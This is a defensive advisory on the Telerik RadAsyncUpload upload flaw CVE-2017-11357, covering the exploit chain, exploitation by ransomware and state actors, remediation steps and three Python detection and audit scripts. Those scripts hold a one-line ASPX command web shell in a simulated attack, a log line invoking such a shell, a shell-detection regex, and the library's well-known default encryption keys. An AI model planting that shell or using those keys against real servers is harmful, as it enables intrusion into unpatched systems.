CVE-2017-11357 — Telerik UI for ASP.NET AJAX Insecure Direct Object Reference Vulnerability

CVE-2017-11357

Telerik RadAsyncUpload — IDOR Enables Arbitrary File Upload to Web Root; Ransomware and Nation-State Exploitation; Related to CVE-2017-11317 and CVE-2019-18935

What Is Telerik RadAsyncUpload?

Telerik UI for ASP.NET AJAX is a commercial .NET web component library used by thousands of enterprise applications globally. The RadAsyncUpload control provides asynchronous file upload through a server-side handler. In the vulnerable versions, that handler takes the folder in which it stores the uploaded temporary file from metadata carried in the upload request itself, and follows that client-supplied reference (an insecure direct object reference, IDOR) without checking that it points inside the intended upload location or that the file type is safe. The metadata is encrypted, but the default encryption key is known (CVE-2017-11317), so an attacker who forges the metadata can upload arbitrary files to locations of their choice, including web-accessible directories where ASPX web shells execute directly.

Overview

Actively Exploited. This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on January 26, 2023. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2017-11357 is an insecure direct object reference that yields unrestricted file upload in the Telerik RadAsyncUpload handler. The handler writes each upload to the folder named in the encrypted metadata of the request; an attacker who can produce that metadata, which the weak default encryption of CVE-2017-11317 makes possible, can place arbitrary file types (including .aspx web shells) in web-accessible locations on the server. Together, CVE-2017-11317 and CVE-2017-11357 form a complete unauthenticated RCE chain: defeat the metadata encryption to forge an upload request, then point the upload at a path under the web root. Patched in Telerik UI for ASP.NET AJAX R3 2017 SP1 (2017.3.1020). CISA added CVE-2017-11357 to the KEV catalog in January 2023; the catalog entry records known use in ransomware campaigns, and the vulnerability has also been used in nation-state intrusions against US government targets.

Affected Versions

Telerik UI Version Status
Telerik UI for ASP.NET AJAX before R3 2017 SP1 (2017.3.1020) Vulnerable
Telerik UI for ASP.NET AJAX R3 2017 SP1 and later Fixed

Technical Details

Root Cause: Unrestricted File Upload via IDOR in Upload Handler

CVE-2017-11357 is an unrestricted file upload vulnerability (CWE-434) in the Telerik RadAsyncUpload handler. The handler processes asynchronous (optionally chunked) file uploads and writes each upload to a temporary folder on the server. That folder is not fixed server-side: it is taken from the encrypted configuration metadata that accompanies every upload request. The IDOR is that the handler follows this client-supplied folder reference without independently verifying that it resolves to the intended temporary location, so whoever can produce valid metadata chooses where the file lands.

Complete exploit chain with CVE-2017-11317:

  1. Stage 1 (CVE-2017-11317): The attacker uses the known default encryption key to forge a valid RadAsyncUpload request carrying metadata of their choosing
  2. Stage 2 (CVE-2017-11357): The forged metadata names a web-accessible directory as the destination folder, and the upload body is an ASPX web shell
  3. Web shell placement: The handler follows the supplied folder reference and writes the ASPX file into that web-accessible location
  4. Remote code execution: The attacker requests the uploaded web shell over HTTP and obtains arbitrary code execution in the context of the IIS application pool identity
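The chain above leaves a recognizable pattern in IIS logs: a POST to the RadAsyncUpload handler from one client, followed shortly by a request from the same client for a server-side executable file that nobody had requested before. The following Python is an added example, not code from this advisory or from Progress/Telerik; it correlates those two events over constructed sample log lines. It assumes IIS W3C logging with a typical field set and that the RadAsyncUpload handler is reached through Telerik.Web.UI.WebResource.axd with a type=rau query string (the query value is taken from the component's public documentation, not from this page).

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample IIS W3C log (not real traffic). User agents carry no
# spaces because IIS writes them with '+'. The handler path is the one named
# in this advisory; "type=rau" selecting RadAsyncUpload is an assumption
# drawn from the component's public documentation.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-01-10 08:00:01 10.0.0.5 GET /Default.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2023-01-10 08:00:09 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.7 python-requests/2.28.1 200
2023-01-10 08:00:12 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.2 Mozilla/5.0 200
2023-01-10 08:00:15 10.0.0.5 GET /uploads/tmp8f3a.aspx cmd=whoami 443 - 203.0.113.7 python-requests/2.28.1 200
2023-01-10 08:01:00 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 198.51.100.9 Mozilla/5.0 200
2023-01-10 08:01:05 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.9 Mozilla/5.0 200
"""

RAU_HANDLER = "/telerik.web.ui.webresource.axd"
EXEC_EXT = (".aspx", ".ashx", ".asmx")


def parse_iis_log(text):
    """Turn W3C log text into dicts keyed by the names in the #Fields: header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log has no #Fields: header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; a real tool would count these
        rec = dict(zip(fields, parts))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def is_rau_upload(rec):
    return (rec["cs-method"] == "POST"
            and rec["cs-uri-stem"].lower().endswith(RAU_HANDLER)
            and "type=rau" in rec["cs-uri-query"].lower())


def find_upload_then_shell(records, window_seconds=600):
    """Flag a client that POSTs to the upload handler and then, within the
    window, requests a never-before-seen .aspx/.ashx/.asmx path.
    Records must be in log (chronological) order. In production, seed
    seen_before from the deployment manifest rather than from log history."""
    findings = []
    seen_before = set()
    uploads = defaultdict(list)  # client IP -> timestamps of handler POSTs
    for rec in records:
        stem, ip = rec["cs-uri-stem"].lower(), rec["c-ip"]
        if is_rau_upload(rec):
            uploads[ip].append(rec["ts"])
        elif stem.endswith(EXEC_EXT) and stem not in seen_before:
            for t in uploads.get(ip, []):
                if 0 <= (rec["ts"] - t).total_seconds() <= window_seconds:
                    findings.append({"client": ip, "upload_at": t,
                                     "shell": rec["cs-uri-stem"],
                                     "query": rec["cs-uri-query"]})
                    break
        seen_before.add(stem)
    return findings


if __name__ == "__main__":
    for f in find_upload_then_shell(parse_iis_log(SAMPLE_IIS_LOG)):
        print(f"{f['client']} uploaded at {f['upload_at']} then hit {f['shell']}?{f['query']}")
```

The second client (198.51.100.9) also POSTs to the handler, which may be legitimate use of the control, and is not flagged because its follow-up request is to a path that already existed; the signal is the new executable path, not the upload alone.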

Why ransomware actors use this chain:

  • Initial access via web shell blends in: shell traffic is ordinary HTTP to an existing application
  • A web shell gives persistent interactive access for reconnaissance without a separate implant
  • From the web shell, attackers escalate privileges on the host and move laterally toward domain administration
  • Ransomware is deployed across the domain once sufficient access has been established

Attack Characteristics

Attribute Detail
Attack Vector Network — HTTP to Telerik upload handler
Authentication None required
Prerequisites CVE-2017-11317 (encryption bypass)
Impact Web shell deployment → RCE → lateral movement
Observed Use Ransomware intrusions, US government targeting

Discovery

Discovered and reported to Progress/Telerik, resulting in the October 2017 patch release.

Exploitation Context

  • CISA advisory on federal targeting: the joint CISA/FBI/MS-ISAC advisory AA23-074A (March 2023) describes threat actors, including a Chinese state-sponsored group and a criminal group, exploiting the Telerik RadAsyncUpload vulnerabilities in a US federal civilian agency's IIS web server, with CVE-2017-11317 and CVE-2017-11357 listed among the related Telerik vulnerabilities
  • Ransomware delivery chain: Ransomware groups used the Telerik chain as initial access against enterprise .NET web applications, dropping web shells for persistent access, then moving laterally to domain controllers before encrypting the environment
  • Persistence via web shells: The uploaded shell keeps working even if network defenses improve after the initial compromise; ASPX web shells under the web root survived patch cycles because patching the OS and the Telerik assembly does nothing to remove files already written there
  • Escalating Telerik vulnerability family: CVE-2017-11357 was later joined by CVE-2019-18935 (a .NET deserialization vulnerability in the same RadAsyncUpload handler, also CVSS 9.8), which turns the same configuration metadata into a deserialization sink and reaches RCE without having to land a web shell under the web root; organizations that patched CVE-2017-11317/11357 but not CVE-2019-18935 remained vulnerable
  • CISA KEV (2023): Added January 26, 2023 after confirmation of active exploitation against US government networks; the related CVE-2019-18935 had been in the catalog since its launch in November 2021
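Because a shell dropped before patching survives the patch, the practical check is a hash comparison of every server-side executable file under the web root against the known-good deployment. The following Python is an added example, not code from this advisory or from Progress/Telerik: it builds a constructed deployment in a temporary directory, takes its inventory, simulates a dropped shell plus a tampered page, and reports anything new or changed, with a keyword heuristic (the marker list is the example's own and is not exhaustive) to prioritize review.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Extensions ASP.NET compiles or executes; .cs covers code-behind (.aspx.cs).
SERVER_SIDE_EXT = {".aspx", ".ashx", ".asmx", ".cs"}

# Constructed marker list for prioritising review. Real shells vary, so a miss
# means "unknown", never "clean"; a hash mismatch is the authoritative signal.
SHELL_MARKERS = re.compile(
    r'Process\.Start|ProcessStartInfo|cmd\.exe|Request\["cmd"\]|'
    r'System\.Diagnostics|eval\(|Assembly\.Load',
    re.IGNORECASE,
)


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_inventory(root: Path) -> dict:
    """Known-good state: relative path -> SHA-256, taken from the release artifact."""
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in SERVER_SIDE_EXT
    }


def scan_web_root(root: Path, inventory: dict) -> list:
    """Report server-side executable files absent from, or differing from, the inventory."""
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in SERVER_SIDE_EXT:
            continue
        rel = p.relative_to(root).as_posix()
        if rel not in inventory:
            status = "NEW"
        elif inventory[rel] != sha256_of(p):
            status = "MODIFIED"
        else:
            continue
        suspicious = bool(SHELL_MARKERS.search(p.read_text(errors="ignore")))
        findings.append({"path": rel, "status": status, "suspicious": suspicious})
    return findings


def demo() -> list:
    """Constructed deployment: inventory it, then simulate post-exploitation changes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Default.aspx").write_text('<%@ Page Language="C#" %>\n<html>hello</html>\n')
        (root / "Default.aspx.cs").write_text("public partial class _Default : System.Web.UI.Page { }\n")
        (root / "App_Data").mkdir()
        (root / "App_Data" / "notes.txt").write_text("not executable, ignored\n")
        inventory = build_inventory(root)

        # Simulated attacker activity (constructed): a shell written into a
        # web-accessible folder via the upload handler, and a backdoored page.
        (root / "uploads").mkdir()
        (root / "uploads" / "tmp8f3a.aspx").write_text(
            '<%@ Page Language="C#" %>\n'
            '<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>\n'
        )
        (root / "Default.aspx").write_text(
            '<%@ Page Language="C#" %>\n<html>hello</html>\n<!-- tampered -->\n'
        )
        return scan_web_root(root, inventory)


if __name__ == "__main__":
    for f in demo():
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{f['status']:9} {flag:10} {f['path']}")
```

In a real engagement the inventory comes from the deployment artifact or source control, not from the live server, and the scan should also cover bin\ and App_Code\, since a dropped assembly there is as dangerous as a dropped .aspx.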

Remediation

CISA BOD 22-01 Deadline: February 16, 2023. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
  1. Apply all three Telerik fixes — upgrade to a release that contains the fixes for CVE-2017-11317 (2017.2.711+), CVE-2017-11357 (2017.3.1020+) and CVE-2019-18935 (2020.1.114+); releases are cumulative, so 2020.1.114 or later covers all three, and patching only the 2017 issues leaves the deserialization path open.

  2. Scan for web shells — immediately scan web application directories for recently created or modified .aspx, .ashx, .asmx, and .aspx.cs files, and compare file hashes against the known-good inventory from source control or the deployment artifact; upgrading the Telerik assembly does not remove a shell that was dropped before the upgrade.

  3. Set explicit keys — configure a cryptographically strong, explicit machineKey in web.config, and set the RadAsyncUpload configuration keys (Telerik.AsyncUpload.ConfigurationEncryptionKey and Telerik.Upload.ConfigurationHashKey in appSettings) to long random values rather than leaving the library defaults that the exploit chain relies on.

  4. Disable RadAsyncUpload if not needed — remove the handler registration (Telerik.Web.UI.WebResource.axd) from web.config if file upload functionality is not required; note that the same handler also serves script and stylesheet resources for other Telerik controls, so test the application after removing it.

  5. Implement file type validation — at the web application firewall, reject upload requests whose part filename ends in .aspx, .ashx, .asmx or another server-side executable extension; legitimate file uploads never carry server-side executable content. The destination folder travels inside the encrypted metadata, which a WAF cannot inspect, so this blocks the obvious web-shell payload but is defense in depth, not a substitute for patching.
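Steps 3 and 4 are web.config checks that can be automated. The following Python is an added example, not code from this advisory or from Progress/Telerik: it audits a web.config for an explicit machineKey, for the RadAsyncUpload configuration keys (Telerik.AsyncUpload.ConfigurationEncryptionKey and Telerik.Upload.ConfigurationHashKey, Telerik's documented appSettings; the default values it compares against are the well-known library defaults cited in public write-ups, so confirm them against your installed version), and for the handler registration, running over a constructed weak configuration and a generated hardened one.

```python
import secrets
import xml.etree.ElementTree as ET

# Library defaults as cited in public write-ups of the RadAsyncUpload issues
# (assumption: confirm against the Telerik.Web.UI.dll version you run).
TELERIK_DEFAULT_KEYS = {
    "Telerik.AsyncUpload.ConfigurationEncryptionKey": "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration",
    "Telerik.Upload.ConfigurationHashKey": "PrivateKeyForHashOfRadAsyncUploadConfiguration",
}
RAU_HANDLER_PATH = "telerik.web.ui.webresource.axd"
MIN_KEY_CHARS = 32

# Constructed weak web.config: no Telerik keys, auto-generated machineKey,
# handler registered. Handler registration lines follow Telerik's documented form.
WEAK_CONFIG = """<configuration>
  <appSettings>
  </appSettings>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
  <system.webServer>
    <handlers>
      <add name="Telerik_Web_UI_WebResource_axd" path="Telerik.Web.UI.WebResource.axd"
           type="Telerik.Web.UI.WebResource" verb="*" preCondition="integratedMode" />
    </handlers>
  </system.webServer>
</configuration>
"""

# Hardened template; key material is filled in by generate_keys()/hardened_config().
HARDENED_TEMPLATE = """<configuration>
  <appSettings>
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey" value="{enc}" />
    <add key="Telerik.Upload.ConfigurationHashKey" value="{hash}" />
  </appSettings>
  <system.web>
    <machineKey validationKey="{vk}" decryptionKey="{dk}" validation="HMACSHA256" decryption="AES" />
  </system.web>
  <system.webServer>
    <handlers>
      <add name="Telerik_Web_UI_WebResource_axd" path="Telerik.Web.UI.WebResource.axd"
           type="Telerik.Web.UI.WebResource" verb="*" preCondition="integratedMode" />
    </handlers>
  </system.webServer>
</configuration>
"""


def generate_keys() -> dict:
    """Fresh machineKey material: 64-byte HMACSHA256 validation key, 32-byte AES-256 key."""
    return {"validationKey": secrets.token_hex(64).upper(),
            "decryptionKey": secrets.token_hex(32).upper()}


def hardened_config() -> str:
    k = generate_keys()
    return HARDENED_TEMPLATE.format(vk=k["validationKey"], dk=k["decryptionKey"],
                                    enc=secrets.token_urlsafe(48), hash=secrets.token_urlsafe(48))


def audit_web_config(xml_text: str, upload_required: bool = True) -> list:
    """Return a list of findings; an empty list means the checks passed."""
    root = ET.fromstring(xml_text)
    findings = []
    app = {e.get("key"): e.get("value", "") for e in root.iter("add") if e.get("key")}
    for key, default in TELERIK_DEFAULT_KEYS.items():
        value = app.get(key)
        if not value or value == default:
            findings.append(f"{key} missing or left at the well-known default")
        elif len(value) < MIN_KEY_CHARS:
            findings.append(f"{key} is too short ({len(value)} chars)")
    mk = root.find("./system.web/machineKey")
    if mk is None:
        findings.append("machineKey not set explicitly (ASP.NET will auto-generate it)")
    else:
        for attr in ("validationKey", "decryptionKey"):
            v = mk.get(attr, "")
            if not v or "AutoGenerate" in v:
                findings.append(f"machineKey {attr} is auto-generated, not an explicit strong key")
    registered = any((e.get("path") or "").lower() == RAU_HANDLER_PATH for e in root.iter("add"))
    if registered and not upload_required:
        findings.append("Telerik.Web.UI.WebResource.axd handler registered but upload not required")
    return findings


if __name__ == "__main__":
    print("weak config:", *audit_web_config(WEAK_CONFIG, upload_required=False), sep="\n  ")
    print("hardened config:", audit_web_config(hardened_config()) or "no findings")
```

Keep the generated values out of source control and rotate them if a server is suspected compromised, since an attacker who has read web.config holds everything the chain needs.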

Key Details

Property  Value
CVE ID  CVE-2017-11357
Vendor / Product  Telerik — User Interface (UI) for ASP.NET AJAX
NVD Published  2017-08-23
NVD Last Modified  2025-10-22
CVSS 3.1 Score  9.8
CVSS 3.1 Vector  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity  CRITICAL
CWE  CWE-434 — Unrestricted Upload of File with Dangerous Type
CISA KEV Added  2023-01-26
CISA KEV Deadline  2023-02-16
Known Ransomware Use  Yes

CVSS 3.1 Breakdown

Attack Vector  Network
Attack Complexity  Low
Privileges Required  None
User Interaction  None
Scope  Unchanged
Confidentiality  High
Integrity  High
Availability  High

Required Action

CISA BOD 22-01 Deadline: 2023-02-16. Apply updates per vendor instructions.

Timeline

Date  Event
2017-08-23  CVE-2017-11357 published by NVD (initial disclosure)
2017-10-18  Progress/Telerik releases R3 2017 SP1 (2017.3.1020) patching CVE-2017-11357
2023-01-26  Added to CISA Known Exploited Vulnerabilities catalog
2023-02-16  CISA BOD 22-01 remediation deadline